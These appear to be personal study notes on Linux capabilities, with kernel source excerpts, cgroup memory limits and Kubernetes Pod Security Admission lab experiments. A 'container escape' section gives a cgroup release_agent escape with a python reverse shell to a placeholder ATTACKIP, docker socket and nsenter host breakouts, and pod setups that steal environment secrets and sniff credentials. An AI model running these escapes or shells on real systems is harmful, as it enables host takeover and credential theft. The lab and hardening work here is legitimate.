Capabilities
It’s actually an additional way to secure (in addition to default RWX) processes. We have main tools in userspace to interact with them:
setcap
getcap
capsh –print
getpcaps $$
(and others from libcap2 package)
From the official debian description:
Libcap implements the user-space interfaces to the POSIX 1003.1e capabilities available in Linux kernels. These capabilities are a partitioning of the all powerful root privilege into a set of distinct privileges.
From linux man page we have all available capabilities, lit’s dive into the source code of one of them
One of them, which everyone knows -
CAP_NET_BIND_SERVICE
Bind a socket to Internet domain privileged ports (port numbers less than 1024).
For a lower level of abstaction we’ll use our programs
In default state typical user without additional permissions can’t run services on ports less than 1024:
program.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
int main() {
int sockfd;
struct sockaddr_in server_addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("Error");
exit(EXIT_FAILURE);
}
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = INADDR_ANY;
server_addr.sin_port = htons(80);
if (bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Error");
close(sockfd);
exit(EXIT_FAILURE);
}
printf("Done!\n");
close(sockfd);
return 0;
}
test@local:~$ gcc program.c -o program
test@local:~$ getcap program
<nothing>
test@local:~$ ./program
Error: Permission denied
root@local:~$ setcap 'cap_net_bind_service=+ep' program
test@local:~$ ./program
Done!
Default one for ex
root@local:~$ getcap /bin/ping
/bin/ping cap_net_raw=ep
In the source code of libcap2(userspace api) we can find the following:
3 variants of capabilities:
# /cap/cap.go
func (f Flag) String() string {
switch f {
case Effective:
return "e"
case Permitted:
return "p"
case Inheritable:
return "i"
default:
return "<Error>"
}
}
Effective - currently activated for process
Permitted - may be potentially activated and moved to Effective
Inheritable - rights, which may be inherited by a child process, if it explicitly requests it
The full list can be found for ex in
/cap/names.go
var names = map[Value]string{
CHOWN: "cap_chown",
DAC_OVERRIDE: "cap_dac_override",
DAC_READ_SEARCH: "cap_dac_read_search",
FOWNER: "cap_fowner",
FSETID: "cap_fsetid",
KILL: "cap_kill",
SETGID: "cap_setgid",
...
In kernel we can find such thing:
/kernel/capability.c
/**
* sys_capget - get the capabilities of a given process.
* @header: pointer to struct that contains capability version and
* target pid data
* @dataptr: pointer to struct that contains the effective, permitted,
* and inheritable capabilities that are returned
*
* Returns 0 on success and < 0 on error.
*/
SYSCALL_DEFINE2(capget, cap_user_header_t, header, cap_user_data_t, dataptr)
{
int ret = 0;
pid_t pid;
unsigned tocopy;
kernel_cap_t pE, pI, pP;
struct __user_cap_data_struct kdata[2];
ret = cap_validate_magic(header, &tocopy);
if ((dataptr == NULL) || (ret != 0))
return ((dataptr == NULL) && (ret == -EINVAL)) ? 0 : ret;
if (get_user(pid, &header->pid))
return -EFAULT;
if (pid < 0)
return -EINVAL;
ret = cap_get_target_pid(pid, &pE, &pI, &pP);
if (ret)
return ret;
/*
* Annoying legacy format with 64-bit capabilities exposed
* as two sets of 32-bit fields, so we need to split the
* capability values up.
*/
kdata[0].effective = pE.val; kdata[1].effective = pE.val >> 32;
kdata[0].permitted = pP.val; kdata[1].permitted = pP.val >> 32;
kdata[0].inheritable = pI.val; kdata[1].inheritable = pI.val >> 32;
/*
* Note, in the case, tocopy < _KERNEL_CAPABILITY_U32S,
* we silently drop the upper capabilities here. This
* has the effect of making older libcap
* implementations implicitly drop upper capability
* bits when they perform a: capget/modify/capset
* sequence.
*
* This behavior is considered fail-safe
* behavior. Upgrading the application to a newer
* version of libcap will enable access to the newer
* capabilities.
*
* An alternative would be to return an error here
* (-ERANGE), but that causes legacy applications to
* unexpectedly fail; the capget/modify/capset aborts
* before modification is attempted and the application
* fails.
*/
if (copy_to_user(dataptr, kdata, tocopy * sizeof(kdata[0])))
return -EFAULT;
return 0;
}
/kernel/capability.c
/*
* The only thing that can change the capabilities of the current
* process is the current process. As such, we can't be in this code
* at the same time as we are in the process of setting capabilities
* in this process. The net result is that we can limit our use of
* locks to when we are reading the caps of another process.
*/
static inline int cap_get_target_pid(pid_t pid, kernel_cap_t *pEp,
kernel_cap_t *pIp, kernel_cap_t *pPp)
{
int ret;
if (pid && (pid != task_pid_vnr(current))) {
const struct task_struct *target;
rcu_read_lock();
target = find_task_by_vpid(pid);
if (!target)
ret = -ESRCH;
else
ret = security_capget(target, pEp, pIp, pPp);
rcu_read_unlock();
} else
ret = security_capget(current, pEp, pIp, pPp);
return ret;
}
/security/security.c
/**
* security_capget() - Get the capability sets for a process
* @target: target process
* @effective: effective capability set
* @inheritable: inheritable capability set
* @permitted: permitted capability set
*
* Get the @effective, @inheritable, and @permitted capability sets for the
* @target process. The hook may also perform permission checking to determine
* if the current process is allowed to see the capability sets of the @target
* process.
*
* Return: Returns 0 if the capability sets were successfully obtained.
*/
int security_capget(const struct task_struct *target,
kernel_cap_t *effective,
kernel_cap_t *inheritable,
kernel_cap_t *permitted)
{
return call_int_hook(capget, target, effective, inheritable, permitted);
}
/include/linux/lsm_hook_defs.h
LSM_HOOK(int, 0, capget, const struct task_struct *target, kernel_cap_t *effective, kernel_cap_t *inheritable, kernel_cap_t *permitted)
/security/security.c
#define call_int_hook(FUNC, ...) ({
int RC = LSM_RET_DEFAULT(FUNC);
do {
struct security_hook_list *P;
hlist_for_each_entry(P, &security_hook_heads.FUNC, list) {
RC = P->hook.FUNC(__VA_ARGS__);
if (RC != LSM_RET_DEFAULT(FUNC))
break;
}
} while (0);
RC;
})
/security/commoncap.c
static struct security_hook_list capability_hooks[] __ro_after_init = {
LSM_HOOK_INIT(capable, cap_capable),
LSM_HOOK_INIT(settime, cap_settime),
LSM_HOOK_INIT(ptrace_access_check, cap_ptrace_access_check),
LSM_HOOK_INIT(ptrace_traceme, cap_ptrace_traceme),
LSM_HOOK_INIT(capget, cap_capget),
LSM_HOOK_INIT(capset, cap_capset),
LSM_HOOK_INIT(bprm_creds_from_file, cap_bprm_creds_from_file),
LSM_HOOK_INIT(inode_need_killpriv, cap_inode_need_killpriv),
LSM_HOOK_INIT(inode_killpriv, cap_inode_killpriv),
LSM_HOOK_INIT(inode_getsecurity, cap_inode_getsecurity),
LSM_HOOK_INIT(mmap_addr, cap_mmap_addr),
LSM_HOOK_INIT(mmap_file, cap_mmap_file),
LSM_HOOK_INIT(task_fix_setuid, cap_task_fix_setuid),
LSM_HOOK_INIT(task_prctl, cap_task_prctl),
LSM_HOOK_INIT(task_setscheduler, cap_task_setscheduler),
LSM_HOOK_INIT(task_setioprio, cap_task_setioprio),
LSM_HOOK_INIT(task_setnice, cap_task_setnice),
LSM_HOOK_INIT(vm_enough_memory, cap_vm_enough_memory),
};
/include/linux/lsm_hooks.h
#define LSM_HOOK_INIT(HEAD, HOOK) { .head = &security_hook_heads.HEAD, .hook = { .HEAD = HOOK } }
/security/commoncap.c
/**
* cap_capget - Retrieve a task's capability sets
* @target: The task from which to retrieve the capability sets
* @effective: The place to record the effective set
* @inheritable: The place to record the inheritable set
* @permitted: The place to record the permitted set
*
* This function retrieves the capabilities of the nominated task and returns
* them to the caller.
*/
int cap_capget(const struct task_struct *target, kernel_cap_t *effective,
kernel_cap_t *inheritable, kernel_cap_t *permitted)
{
const struct cred *cred;
/* Derived from kernel/capability.c:sys_capget. */
rcu_read_lock();
cred = __task_cred(target);
*effective = cred->cap_effective;
*inheritable = cred->cap_inheritable;
*permitted = cred->cap_permitted;
rcu_read_unlock();
return 0;
}
/include/linux/cred.h
struct cred {
atomic_long_t usage;
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct ucounts *ucounts;
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
Container escape abuse examples
If privileged mode, then maybe:
> capsh --print
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid,cap_setuid
cap_sys_admin - allows mounting fs
> mkdir /tmp/expl
> mount -t cgroup -o rdma cgroup /tmp/expl
> mkdir /tmp/expl/x
> echo 1 > /tmp/expl/x/notify_on_release
> host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
> echo "$host_path/exploit" > /tmp/expl/release_agent
> cat > /exploit << EOF
#!/bin/bash
export RHOST="ATTACKIP";export RPORT=31337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
EOF
> chmod a+x /exploit
> sh -c "echo \$\$ > /tmp/expl/x/cgroup.procs"
If docker socket is exposed:
docker run -it --rm -v /:/host alpine chroot /host sh
Even if we are already in the container, socket is host based, so if we the mount host folder, it will also be the first level filesystem(it’s on the host, no matter how many times deep we’re in the container)
If docker daemon is exposed(portainer/jenkins for remote administration):
port 2375
docker -H tcp://REMOTEIP:2375 ps
docker -H tcp://REMOTEIP:2375 run -it --rm -v /:/host alpine chroot /host sh
Namespaces abuse:
nsenter --target 1 --mount --uts --ipc --net /bin/bash
We switch namespaces to PID 1 process
Cgroups
Check which cgroups version is used (different directories structure, so we need to know :) )
mount | grep cgroup
if cgroup2 so v2
Create out own cgroup:
sudo mkdir /sys/fs/cgroup/custom_cgroup
Limit memory(50MB):
echo $((50 * 1024 * 1024)) | sudo tee /sys/fs/cgroup/custom_cgroup/memory.max
Create new process or just out current PID into out cgroup’s config:
echo $$ | sudo tee /sys/fs/cgroup/custom_cgroup/cgroup.procs
Run test
stress --vm-bytes 49M --vm-keep -m 1
> OK
stress --vm-bytes 100M --vm-keep -m 1
Get smth like(OOM kills us):
stress: info: [247560] dispatching hogs: 0 cpu, 0 io, 1 vm, 0 hdd
stress: FAIL: [247560] (425) <-- worker 247561 got signal 9
stress: WARN: [247560] (427) now reaping child worker processes
stress: FAIL: [247560] (461) failed run completed in 0s
Check stats:
cat /sys/fs/cgroup/my_cgroup/memory.events
low 0
high 0
max 13539
oom 4
oom_kill 4
oom_group_kill 0
(I tried it 4 times)
Links / Resources
Linux Capabilities: making them work
Kubernetes Escapes / Pod Privilege Escalations
Experiments we taken from here
Examples and expretiments in the article were made with PSP (Pod Security Policies). Currently this technology is deprecated
Removed feature
PodSecurityPolicy was deprecated in Kubernetes v1.21, and removed from Kubernetes in v1.25.
My current k8s version is v1.30.4, so we should use PSA (Pod Security Admission)
All configs in the article will still work, so if we want to:
spec:
hostPID: true
It will work, but the conception of security in the current k8s state is to do it via PSA
So how it should be done now? Here it is
We define security profiles for namespaces (not for pods) and we have 3 predefined levels here:
- privileged: (allowed)
-
- Privileged Containers: Pod can be run with the
privileged: true
flag
- Privileged Containers: Pod can be run with the
-
- Host access: Allow parameters such as
hostPID: true
,hostIPC: true
,hostNetwork: true
, and binding to host ports
- Host access: Allow parameters such as
-
- Running with root privileges: Containers can run as root user (
runAsUser=0
) without any restrictions
- Running with root privileges: Containers can run as root user (
-
- Mounting sensitive file systems: Mounting volumes like
hostPath
,proc
and others that provide direct access to the host file system is allowed
- Mounting sensitive file systems: Mounting volumes like
-
- Unprotected capabilities: All Linux capabilities such as
CAP_SYS_ADMIN
orCAP_NET_ADMIN
are allowed
- Unprotected capabilities: All Linux capabilities such as
- baseline (allowed)
-
- Normal Containers: Containers can work with both root and unprivileged users, but it is forbidden to explicitly enable privileged mode (
privileged: false
)
- Normal Containers: Containers can work with both root and unprivileged users, but it is forbidden to explicitly enable privileged mode (
-
- Limited access to host resources: Parameters such as
hostPID
,hostIPC
,hostNetwork
, andhostPorts
are denied by default
- Limited access to host resources: Parameters such as
-
- Partial access to capabilities: Only safe capabilities such as
CAP_CHOWN
,CAP_SETUID
,CAP_SETGID
are allowed, but unsafe capabilities such asCAP_SYS_ADMIN
are prohibited
- Partial access to capabilities: Only safe capabilities such as
-
- Mounting safe volumes: Standard volume types are allowed, but volumes of type
hostPath
that provide access to the host file system are forbidden
- Mounting safe volumes: Standard volume types are allowed, but volumes of type
-
- Running containers as root user: Allowed by default, but it is recommended to avoid this by using
runAsNonRoot
- Running containers as root user: Allowed by default, but it is recommended to avoid this by using
- restricted (forbidden)
-
- Privileged Containers: Completely prohibit the use of
privileged: true
- Privileged Containers: Completely prohibit the use of
-
- Access to host resources: The
hostPID
,hostIPC
,hostNetwork
, and use of host ports are completely prohibited
- Access to host resources: The
-
- Run as root: Containers must be run as non-root with the
runAsNonRoot: true
parameter
- Run as root: Containers must be run as non-root with the
-
- Mounting file systems: Mounting unsafe volumes such as
hostPath
is prohibited. Only standard, secure volume types are allowed
- Mounting file systems: Mounting unsafe volumes such as
-
- Restricted capabilities: Containers cannot request extended privileges such as
CAP_SYS_ADMIN
and other high-risk capabilities
- Restricted capabilities: Containers cannot request extended privileges such as
- restricted (allowed)
-
- Unprivileged containers: Containers can only be run with the minimum required privileges
-
- Running as a non-root user: Use of
runAsNonRoot
is mandatory
- Running as a non-root user: Use of
-
- Enhanced Security: Requirements for AppArmor, seccomp and other security mechanisms (if enabled)
And we also have 3 labels, the names speak for themselves:
- enforce - policy violations will cause the pod to be rejected
- audit - policy violations will trigger the addition of an audit annotation to the event recorded in the audit log, but are otherwise allowed
- warn - policy violations will trigger a user-facing warning, but are otherwise allowed
Experiments
We will create a namespace and a pod and change its properties
ns.yml
apiVersion: v1
kind: Namespace
metadata:
name: vuln-psa-ns
attacker.yml
apiVersion: v1
kind: Pod
metadata:
name: attacker
namespace: vuln-psa-ns
spec:
containers:
- name: attacker
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
nodeName: worker
And now let’s go through the list from the article and adopt PSP things with currently being used PSA
hostPID
We can access the list of PIDs of the host if we set hostPID: true
in spec
This allows us to read enviroments of others cluster pods processes and kill processes
...
spec:
hostPID: true
...
If we do nothing with the namespace and do not assign any labels, we can simple run it and benefit:
> kubectl -n vuln-psa-ns exec -it pods/hostpid-pod -- ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 170336 12704 ? Ss Aug11 1:49 /sbin/init
root 2 0.0 0.0 0 0 ? S Aug11 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Aug11 0:00 [pool_workque
root 4 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-rc
root 5 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-rc
root 6 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-sl
root 7 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-ne
root 9 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/0:0H
root 11 0.0 0.0 0 0 ? I Aug11 0:00 [kworker/u8:0
root 12 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-mm
root 13 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_kt
root 14 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_ru
root 15 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_tr
root 16 0.0 0.0 0 0 ? S Aug11 0:05 [ksoftirqd/0]
...
To test our ability to steal env we can create another pod (in default ns, doesn’t matter) and get the source of /proc/pid/environ
file(it’s obviously important so that the both pods would be on the same node):
victim.yml
apiVersion: v1
kind: Pod
metadata:
name: victim
spec:
containers:
- name: victim
image: ubuntu
command: [ "/bin/bash", "-c", "--" ]
args: [ "FLAG=supersecret sleep 9999999" ]
nodeName: worker
kubectl -n vuln-psa-ns exec -it pods/hostpid-pod -- bash
root@hostpid-pod:/# ps aux | grep 999
root 1549154 0.0 0.0 2384 1024 ? Ss 20:17 0:00 sleep 9999999
root@hostpid-pod:/# grep -a "FLAG" /proc/1549154/environ
FLAG=supersecretKUBERNETES_SERVICE_PORT_HTTPS=443KUBERNETES_S....
Now lets add labels to our namespace config:
- If we add
pod-security.kubernetes.io/enforce: privileged
- nothing changes, we still can do all the things - If we add
pod-security.kubernetes.io/warn: restricted
we get a warning, but still the pods has been createdkubectl create -f attacker.yml Warning: would violate PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "attacker" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "attacker" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "attacker" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "attacker" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost") pod/attacker created
So from now on we’ll use just
enforce: privileged
orenforce: restricted
because we test :) - and if
pod-security.kubernetes.io/enforce: restricted
:kubectl apply -f attacker.yml ⎈ default Error from server (Forbidden): error when creating "attacker.yml": pods "attacker" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "attacker" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "attacker" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "attacker" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "attacker" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
And the pod is not created
hostNetwork
victim1.yml
apiVersion: v1
kind: Pod
metadata:
name: victim1
labels:
app: victim1
namespace: vuln-psa-ns
spec:
containers:
- name: victim1
image: ubuntu
command: [ "/bin/bash", "-c", "--" ]
args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 && python3 -m http.server 8080" ]
nodeName: worker
---
apiVersion: v1
kind: Service
metadata:
name: victim1
namespace: vuln-psa-ns
spec:
selector:
app: victim1
ports:
- protocol: TCP
port: 8080
targetPort: 8080
type: ClusterIP
On victim1 we have a python server:
root@victim1:/# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1/python3
root@victim1:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.42.2.60 netmask 255.255.255.0 broadcast 10.42.2.255
inet6 fe80::8420:9aff:fe6f:b378 prefixlen 64 scopeid 0x20<link>
ether 86:20:9a:6f:b3:78 txqueuelen 0 (Ethernet)
RX packets 26414 bytes 38519569 (38.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11444 bytes 881368 (881.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
On victim2 we will periodically send post requests with secret data to out victim1
victim2.yml
apiVersion: v1
kind: Pod
metadata:
name: victim2
namespace: vuln-psa-ns
spec:
containers:
- name: victim2
image: ubuntu
command: [ "/bin/bash", "-c", "--" ]
args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y curl; while true; do curl -H 'Content-Type: application/json' -d '{ \"admin\":\"admin\", \"password\":\"Sup3r_S3cr3t\" }' -X POST victim1:8080; sleep 2; done" ]
nodeName: worker
And now the attacker:
apiVersion: v1
kind: Pod
metadata:
name: attacker
namespace: vuln-psa-ns
spec:
hostNetwork: true
containers:
- name: attacker
image: ubuntu
command: [ "/bin/bash", "-c", "--" ]
args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y tcpdump; tcpdump -i cni0 -A -s 0 'tcp port 8080'" ]
nodeName: worker
And we succesefully get:
..(.)Ik.POST / HTTP/1.1
Host: victim1:8080
User-Agent: curl/8.5.0
Accept: */*
Content-Type: application/json
Content-Length: 46
{ "admin":"admin", "password":"Sup3r_S3cr3t" }
Usually the traffic inside the cluster isn’t encrypted (ssl) so we can get such info by sniffing
Also we can access the services running on host(node) interfaces, like:
I run python server on node
and inside the pod with enabled hostNetwork I can access it
root@worker:/# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:31337 0.0.0.0:* LISTEN -
As in the previous example if we enable PSA
with pod-security.kubernetes.io/enforce: restricted
the pod is prohibited to be created
hostIPC
It doesn’t work for pods with this config feature (if you create smth in shared /dev/shm in any pod and try to get it inside your attacker pod, it woun’t, just files and staff created on the real host)
attacker.yml
apiVersion: v1
kind: Pod
metadata:
name: attacker
namespace: vuln-psa-ns
spec:
hostIPC: true
containers:
- name: attacker
image: ubuntu
command: [ "/bin/bash", "-c", "--" ]
args: [ "sleep 99999" ]
nodeName: worker
On the host we put smth to /dev/shm/secretfile
and now we can access it from the created pod
hostPath
privileged
All Links / Resources
Papers extracted from the proceedings of the Ottawa Linux Symposium